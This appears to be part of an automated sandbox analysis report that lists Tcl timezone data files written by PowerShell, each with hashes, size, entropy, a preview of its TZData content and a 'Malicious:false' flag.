                                                                                                                                                                                                                              SHA-512:3D65C7941BA15A698264848F9B6F43ED5B63D4CF86D495334E8E1DC381D63435E9424BBBC389229693D20044FDB8425A7CC805AB5EA055F59D3E0DD4C7AC2A28
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Palmer) {.. {-9223372036854775808 0 0 -00}.. {-157766400 -14400 0 -04}.. {-152654400 -14400 0 -04}.. {-132955200 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-101419200 -10800 1 -04}.. {-86821200 -14400 0 -04}.. {-71092800 -10800 1 -04}.. {-54766800 -14400 0 -04}.. {-39038400 -10800 1 -04}.. {-23317200 -14400 0 -04}.. {-7588800 -10800 0 -03}.. {128142000 -7200 1 -03}.. {136605600 -10800 0 -03}.. {389070000 -14400 0 -04}.. {403070400 -10800 1 -04}.. {416372400 -14400 0 -04}.. {434520000 -10800 1 -04}.. {447822000 -14400 0 -04}.. {466574400 -10800 1 -04}.. {479271600 -14400 0 -04}.. {498024000 -10800 1 -04}.. {510721200 -14400 0 -04}.. {529473600 -10800 1 -04}.. {545194800 -14400 0 -04}.. {560923200 -10800 1 -04}.. {574225200 -14400 0 -04}.. {592372800 -10800 1 -04}.. {605674800 -14400 0 -04}.. {624427200 -10800 1 -04}.. {63712
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):151
                                                                                                                                                                                                                              Entropy (8bit):4.829975802206526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2L0GRHEsKRsMXGm2OHvavFN/H3VVFVGAvFv:SlSWB9eg/2L0rRsDm2OHEN/VVFAKV
                                                                                                                                                                                                                              MD5:C330982049AA053DA62B926627D2F2FA
                                                                                                                                                                                                                              SHA1:050CE68265F1A183F0173C825AC59EAE8B6AB9EB
                                                                                                                                                                                                                              SHA-256:943F10D8E836773F0B7ACD13ED8422C0B27813C7BBE0B09B57697D1D70D21ECE
                                                                                                                                                                                                                              SHA-512:DE9953D0E505D6B110C0CC4E756B5B0311646C9CA4703A33B92147D36CFB4C288D73851E6766CE1432F41AB51B5D0A1D58680BDB4E28F067E1D36F670B4A192E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Rothera) {.. {-9223372036854775808 0 0 -00}.. {218246400 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):198
                                                                                                                                                                                                                              Entropy (8bit):4.906125935761354
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3ycqXHAIgObOvRN/2L0tlo+ply:MByMdTiYt2LMq+p8
                                                                                                                                                                                                                              MD5:8095A3749DBDE05377836D74A4EEFE33
                                                                                                                                                                                                                              SHA1:6987CA972B63AE26A65654961588D51D3EF2166C
                                                                                                                                                                                                                              SHA-256:88057832175BB642B23FC99F788A2F78A24005CF1F84A7B1B5E8C84FB8F4D4C1
                                                                                                                                                                                                                              SHA-512:9066104C9C16D2AB88523D651C74CE268468E093A497D128D0D12A986BD62DBC1388A56ED1737C2AFACF04185CF06FD0EE66797A3390B2F0E1EB08A4D92AAFAD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:Antarctica/South_Pole) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.871844665431957
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2L0GRHEtWlFBQWFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2L0tQB
                                                                                                                                                                                                                              MD5:CA52057130DCF506D11A7CC069F4FBA3
                                                                                                                                                                                                                              SHA1:2C38B7E7872BB41C3569DFCB539C3EC3AAE24FDD
                                                                                                                                                                                                                              SHA-256:2488805DE4FEA42305689F679F1AE2D80B1E934E657FEA329AD39A82DAC63022
                                                                                                                                                                                                                              SHA-512:B19D409870939C8F0834C6C028239E010EE5128DFA6E97D4903BECA229B04FE530EA376B936767D9BFE21709720C1791289D8E3622B17C18F2680B0670794A02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Antarctica/Syowa) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5370
                                                                                                                                                                                                                              Entropy (8bit):3.5134546899897146
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:YveRdmbxnKIJqU9XThVIsopb8BcrFgoZVlzeEG+PtJ:UeRdmNnKIIajfopb3FVVJ
                                                                                                                                                                                                                              MD5:442F495C36B31CA5D7A9BEFF12105AEF
                                                                                                                                                                                                                              SHA1:B3F6CA5B4A5756F9B2C09A27198F7A651CC6032D
                                                                                                                                                                                                                              SHA-256:6FD5AB8B7B308CDCEA4B747A81D8675988AE218813C91714FC4CA97919CEBEA5
                                                                                                                                                                                                                              SHA-512:C6EAECC26D67D218615EBB5602639DAB62A2578BD9683553D765DC1AC5580627D29B6F911388F5F1BFC284278EA4EBECE94630D3C6B95FF9EF93D3D61A3C2028
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Troll) {.. {-9223372036854775808 0 0 -00}.. {1108166400 0 0 +00}.. {1111885200 7200 1 +02}.. {1130634000 0 0 +00}.. {1143334800 7200 1 +02}.. {1162083600 0 0 +00}.. {1174784400 7200 1 +02}.. {1193533200 0 0 +00}.. {1206838800 7200 1 +02}.. {1224982800 0 0 +00}.. {1238288400 7200 1 +02}.. {1256432400 0 0 +00}.. {1269738000 7200 1 +02}.. {1288486800 0 0 +00}.. {1301187600 7200 1 +02}.. {1319936400 0 0 +00}.. {1332637200 7200 1 +02}.. {1351386000 0 0 +00}.. {1364691600 7200 1 +02}.. {1382835600 0 0 +00}.. {1396141200 7200 1 +02}.. {1414285200 0 0 +00}.. {1427590800 7200 1 +02}.. {1445734800 0 0 +00}.. {1459040400 7200 1 +02}.. {1477789200 0 0 +00}.. {1490490000 7200 1 +02}.. {1509238800 0 0 +00}.. {1521939600 7200 1 +02}.. {1540688400 0 0 +00}.. {1553994000 7200 1 +02}.. {1572138000 0 0 +00}.. {1585443600 7200 1 +02}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.940298769001579
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8s4YkyXHAIgNrYOARL/2L0GRHEoKcMFeWFKjov:SlSWB9vsM3yMGSHAIgvAN/2L0XcMFewh
                                                                                                                                                                                                                              MD5:F61B4D02530B54A8EB1CA7B34BF6D553
                                                                                                                                                                                                                              SHA1:EB85E044EF9F7D11310C5EBB8D1D0C49A1E3067F
                                                                                                                                                                                                                              SHA-256:1892E98C13AC141C8C92EAB942B073A464BA5E2C000C250F97F860BE6B108127
                                                                                                                                                                                                                              SHA-512:E725E909A4056B7E4FADBE66B69E6C4752595F3357E670A7D740A2DA957F2C9502ECA57B9BA874045ED032B8F65A10D11AFAF69EA9673187FD4AE08793492470
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Urumqi)]} {.. LoadTimeZoneFile Asia/Urumqi..}..set TZData(:Antarctica/Vostok) $TZData(:Asia/Urumqi)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.947168975083595
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2XbeLo4cA4FH/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2XbUyAH
                                                                                                                                                                                                                              MD5:A4F076D7D716467B78EA382FA222CB38
                                                                                                                                                                                                                              SHA1:21D7FBA308ADC652F541A0336929B862F7B1BD0B
                                                                                                                                                                                                                              SHA-256:25462B656D240DA6B01C1A630FAC04B25DD65C799B659BE1C8BD3AB62610966F
                                                                                                                                                                                                                              SHA-512:1B6BD455E533D5BDC7F3506561A9CA804B1F9CA5CC0665AAB0FC083106AB32FF149DD5FFF62EF7BABAD87E3274F264446D492FB8BE160C9C7F281C7060BF1F61
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Arctic/Longyearbyen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                              Entropy (8bit):4.829666491766117
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2WFK4h4WFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2wKs46
                                                                                                                                                                                                                              MD5:60D7F3194F19179E0CF0F561F9C40EE6
                                                                                                                                                                                                                              SHA1:B079EC49485CFBFFB7A5BE6149319B75684258E9
                                                                                                                                                                                                                              SHA-256:8FCDDB246932BAED880B70C0CA867057E7989AEA55EDDC174430E1055CD1058D
                                                                                                                                                                                                                              SHA-512:0BDC86B1D473D4875C6F7C092F955D0999E6C1F2EF83CFC7726A3C5BFEB0F5CB8E00B1F0CBC1F91F806EC635C472927504DF681A32DAC55EF372DA16FEA9EF40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Asia/Aden) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1637
                                                                                                                                                                                                                              Entropy (8bit):3.732051305399264
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5qehddmvOt81FCuLqecDngO6jPvTpYy5T4TXvKT10SvPFu+a+CK/Eu3CWuD0Vob1:5YvdJqxiF0rvK50Sv9fGSM
                                                                                                                                                                                                                              MD5:D6BCB21F65642F36A159AFD72EC93953
                                                                                                                                                                                                                              SHA1:D3E670E579924E6E4F04AB574D48334FF521D8B2
                                                                                                                                                                                                                              SHA-256:06DC608C0B8CDD69CCE66A6BF86F141C46DF39CB45312E684E46F19ED8CAFF15
                                                                                                                                                                                                                              SHA-512:9A633B629873E5EE5AF923A94865EBE5FD9ECA181B2C47B7368A0828468715E07AD3FD825D5E2312D2D0BA1FA5490E3817C36B6339824C8012A0B75538C4A0DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Almaty) {.. {-9223372036854775808 18468 0 LMT}.. {-1441170468 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {695768400 21600 0 +06}.. {701812800 25200 1 +06}.. {717537600 21600 0 +06}.. {733262400 25200 1 +06}.. {748987200 21600 0 +06}.. {764712
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2682
                                                                                                                                                                                                                              Entropy (8bit):3.7873260611521915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5MUNHl0Nhb9bGA9jSb0PWtsjOuH7Ay2n3yy7QYoTZg703q4oPuJ9/YXjpdaOP9kA:Fz0T52akyId7+xOXdkwqeIFcR
                                                                                                                                                                                                                              MD5:7E70BD44FBF5BF70E3C5246D3A83A49B
                                                                                                                                                                                                                              SHA1:10A28B0A3189DF347CF9853C024E9467CAC56DBA
                                                                                                                                                                                                                              SHA-256:B70AABECACD3F62AF506DF395AB44F47F2CA091522B04EC87AC1407172DD1BFA
                                                                                                                                                                                                                              SHA-512:766565F837EB777749B2C8AAE6C73A2274A772CEF12E7C2E30A89809FEF1E9ED6B067DF044A4676AA4BE76A64A904692C3887336BF01BA4D5D9A5020FB792938
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Amman) {.. {-9223372036854775808 8624 0 LMT}.. {-1230776624 7200 0 EET}.. {108165600 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {215643600 7200 0 EET}.. {231285600 10800 1 EEST}.. {244501200 7200 0 EET}.. {262735200 10800 1 EEST}.. {275950800 7200 0 EET}.. {481154400 10800 1 EEST}.. {496962000 7200 0 EET}.. {512949600 10800 1 EEST}.. {528670800 7200 0 EET}.. {544399200 10800 1 EEST}.. {560120400 7200 0 EET}.. {575848800 10800 1 EEST}.. {592174800 7200 0 EET}.. {610581600 10800 1 EEST}.. {623624400 7200 0 EET}.. {641167200 10800 1 EEST}.. {655074000 7200 0 EET}.. {671839200 10800 1 EEST}.. {685918800 7200 0 EET}.. {702856800 10800 1 EEST}.. {717973200 7200 0 EET}.. {733701600 10800 1 EEST}.. {749422800
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2086
                                                                                                                                                                                                                              Entropy (8bit):3.7698340044911616
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5DeEdVrEOeFt7YFpR2kHmxCcUdBbcHDLV2vpXt25A0UeRr9ydzkMfF6USRWk9UuV:5ZejsFLrcZwvJt2F+doTr9Q3G80
                                                                                                                                                                                                                              MD5:6EFC35043BDCA4AB61D72E931DB954E6
                                                                                                                                                                                                                              SHA1:F0B4E76C154DC773073E41AA8E94030E972A986A
                                                                                                                                                                                                                              SHA-256:D9DF64FDA4638F7604624B0F68A885D5ABADB1DE12AF1AF5581C2AF7DD971562
                                                                                                                                                                                                                              SHA-512:16AE582B113D6960C73B64620A8AF20F9D436AA4B3EC8E881617AED3389EB4357931882103F162F19EE8202953A7E6FB4FDD6D7760FB7621F4DB9D229AD13F17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Anadyr) {.. {-9223372036854775808 42596 0 LMT}.. {-1441194596 43200 0 +12}.. {-1247572800 46800 0 +14}.. {354884400 50400 1 +14}.. {370692000 46800 0 +13}.. {386420400 43200 0 +13}.. {386424000 46800 1 +13}.. {402231600 43200 0 +12}.. {417960000 46800 1 +13}.. {433767600 43200 0 +12}.. {449582400 46800 1 +13}.. {465314400 43200 0 +12}.. {481039200 46800 1 +13}.. {496764000 43200 0 +12}.. {512488800 46800 1 +13}.. {528213600 43200 0 +12}.. {543938400 46800 1 +13}.. {559663200 43200 0 +12}.. {575388000 46800 1 +13}.. {591112800 43200 0 +12}.. {606837600 46800 1 +13}.. {622562400 43200 0 +12}.. {638287200 46800 1 +13}.. {654616800 43200 0 +12}.. {670341600 39600 0 +12}.. {670345200 43200 1 +12}.. {686070000 39600 0 +11}.. {695746800 43200 0 +13}.. {701791200 46800 1 +13}.. {717516000 43200 0 +12}.. {733240800 46800 1 +13}.. {748965
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1665
                                                                                                                                                                                                                              Entropy (8bit):3.7149890651919644
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5uvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIkhYwr:sFBNKs6b03zB0WJEuDa7sFZiKWaN6TiF
                                                                                                                                                                                                                              MD5:A72FB1FE01C93BD7E0A8136635C72639
                                                                                                                                                                                                                              SHA1:2383CF839F50784D4BF8B7EDDB324C80E2DDD0DC
                                                                                                                                                                                                                              SHA-256:96B510AF9B8C6BC1DFA84E9ED5E072F3FD484EEB66BBEBC7B6826ED859ED9027
                                                                                                                                                                                                                              SHA-512:061FECE3C750C0229638DD8AF38FB3E8E48E59E0DE1B13BCFE46483A7A170B71B9BCB0D6F110B6B2EF68510FA940F9066F14CBD59829E222D6644D3657CE1893
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtau) {.. {-9223372036854775808 12064 0 LMT}.. {-1441164064 14400 0 +04}.. {-1247544000 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {7647156
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1666
                                                                                                                                                                                                                              Entropy (8bit):3.721746335201775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5FUvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQR:PwaBNKs6b03zB0WJEuDa7sFZiKWaN6Tt
                                                                                                                                                                                                                              MD5:E278B985BD2515DBCAED8CB741BE9208
                                                                                                                                                                                                                              SHA1:BC9F5E72C430661D7ED1AF04571CE5D0F73DD18D
                                                                                                                                                                                                                              SHA-256:991638FA2AB2A2F7A091A23D78D99306EE73A740F1A03FBAC448EDCAB55A0E38
                                                                                                                                                                                                                              SHA-512:9951DB729B837647CC4B3D2E605525DCCBAFFD39D76460331BF62235DCAE5E4470CDA578F940B1739AABFEC55D293FF60D79AE0EFDFE1EB64E84571881FDEA6A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtobe) {.. {-9223372036854775808 13720 0 LMT}.. {-1441165720 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                              Entropy (8bit):3.937249024843323
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5ggeRMdIQvNcDvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKTob3CGcr:5gbkvNSvNhQQvmRKqv0fvzQIovWdvEGD
                                                                                                                                                                                                                              MD5:259179C7A1CA04F9F3A373B6C8FCB8C5
                                                                                                                                                                                                                              SHA1:D042DF8EFD8EC1473B45B1131BD5EB714F1B2C17
                                                                                                                                                                                                                              SHA-256:13745BFA25E6E2D8D0FABAE42CB7C37CF9F974CFB343D4FE84E4E2D64A25926B
                                                                                                                                                                                                                              SHA-512:703BEAD5A1E5B3816D98057A08A87C2139F418787F38561FE35175B84E2005365727F85D1B949CC5DF464B207A7D01BB65FB1A632E73DDA523E843B82D76FBBD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ashgabat) {.. {-9223372036854775808 14012 0 LMT}.. {-1441166012 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +05}.. {370720800 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.801820439218014
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8xEYM4DyXHAIgN/ZEYovFvWARL/2WFKUNSH+WFKYEQ:SlSWB9vsM3yR+HAIgH8VWAN/2wKUNSeq
                                                                                                                                                                                                                              MD5:5193EF7ADB646798801245BC50C8DDA6
                                                                                                                                                                                                                              SHA1:83ED851CBC60EFB330A8FC119E1BED5B4C0BA630
                                                                                                                                                                                                                              SHA-256:2C752F641B98E3C05B14AE31330D1F198DAA4A7E354BA9670C7754926BFB891A
                                                                                                                                                                                                                              SHA-512:E940E1BE67A9AC895F3D060B1CB34797A429147A9DC2AC0F1162D37D86661EF217EDABA720F0AE3796186FE801229210AC785BB4511CBBE5A41791D236101D8C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ashgabat)]} {.. LoadTimeZoneFile Asia/Ashgabat..}..set TZData(:Asia/Ashkhabad) $TZData(:Asia/Ashgabat)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1666
                                                                                                                                                                                                                              Entropy (8bit):3.7265766742957402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:55TvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQJ:XrFBNKs6b03zB0WJEuDa7sFZiKWaN6Tl
                                                                                                                                                                                                                              MD5:0236793F90ABC6F68718DDBB44AF5E2F
                                                                                                                                                                                                                              SHA1:A5EFAEEF9B9159E748A3FED231F8A978E400482E
                                                                                                                                                                                                                              SHA-256:4B7B118E6AE72D41740CF0CB2BD8E970700758DCBC0DD6F298199D841DF8408E
                                                                                                                                                                                                                              SHA-512:851C7A9C110790454312BB9C5B5D3C426365EEF4673191B9ABB2E4A32301894C5FB1ADCBE2A4C67BEE416AD63FB8BED85F94EF9BF42473DA4BFFA7824935A1D5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Atyrau) {.. {-9223372036854775808 12464 0 LMT}.. {-1441164464 10800 0 +03}.. {-1247540400 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764715
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1702
                                                                                                                                                                                                                              Entropy (8bit):3.7261419515679393
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eVvyGiHD6UC4UrUomFMmUZcjbUKNFcUEUvUOpU8MYUWCUlbf/U9bUiUUybUQUF:5m8G9mFdnNF1FfsTuvQXHCe
                                                                                                                                                                                                                              MD5:690013310A46BD1AE250A5E019353809
                                                                                                                                                                                                                              SHA1:0DF434C7EEB707DC071007FAB112F4DEB37E936F
                                                                                                                                                                                                                              SHA-256:D20B75D2604C3B742C1629C5EE02CFF6783E472249982B272B68F2A6DE9BDC38
                                                                                                                                                                                                                              SHA-512:FF8C33E55E4F006C38D3FD37A1AD3E1200718CA374ECBEAE8255C7635912F0BB23A59A600BF7130D5660A24C515F726E8440D0D908E560CB59F74059638E6AA2
                                                                                                                                                                                                                              Malicious:false
